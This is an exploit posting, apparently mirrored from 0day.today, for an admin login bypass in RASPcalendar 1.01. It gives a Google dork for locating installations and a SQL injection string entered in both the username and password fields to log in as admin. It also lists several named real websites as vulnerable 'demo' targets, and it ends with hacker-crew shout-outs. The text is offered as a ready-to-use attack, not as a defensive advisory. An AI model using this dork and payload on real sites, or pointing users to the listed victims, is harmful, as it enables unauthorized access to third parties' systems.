RASPcalendar 1.01 - Admin Login bypass Vulnerability

🗓️ 08 Nov 2013 00:00:00Reported by Hackeri-ALType

zdt🔗 0day.today👁 33 Views

RASPcalendar 1.01 Admin Login bypass Vulnerability in Windows X

---------------------------------------------------
RASPcalendar 1.01 - Admin Login bypass Vulnerability
---------------------------------------------------
Author          : Hackeri-AL
Date            : 06-11-2013
Vendor Homepage : http://www.rttucson.com/files.html
Software link   : http://www.rttucson.com/RASPcalendar.zip
Verison         : 1.01
Tested On       : Windows XP
------------------------------------------------------------
 
Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
 
------------------------------------------------------------
 
Example  : http://www.usfim.it/RASPcalendar/
         : http://site.com/events
         : http://site.com/calendar
         : etc...
 
Go to    : http://www.usfim.it/RASPcalendar/admin/
 
UserName : 1'or'1
PassWord : 1'or'1
 
Login Success Fully :D
 
------------------------------------------------------------
 
Vuln sites demo :
 
http://www.usfim.it/RASPcalendar/admin
http://www.davemitchellassociates.com/events/admin
http://www.bradandrebecca.com/Calendar/admin
http://www.hlubline.com/pt/calendar/admin
 
------------------------------------------------------------
 
Found By Hackeri-AL , UAH-Crew Group 2009-2013
 
UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~
 
[~] Legends Of Albania
 
------------------------------------------------------------

#  0day.today [2018-01-08]  #

08 Nov 2013 00:00Current

7.1High risk

Vulners AI Score7.1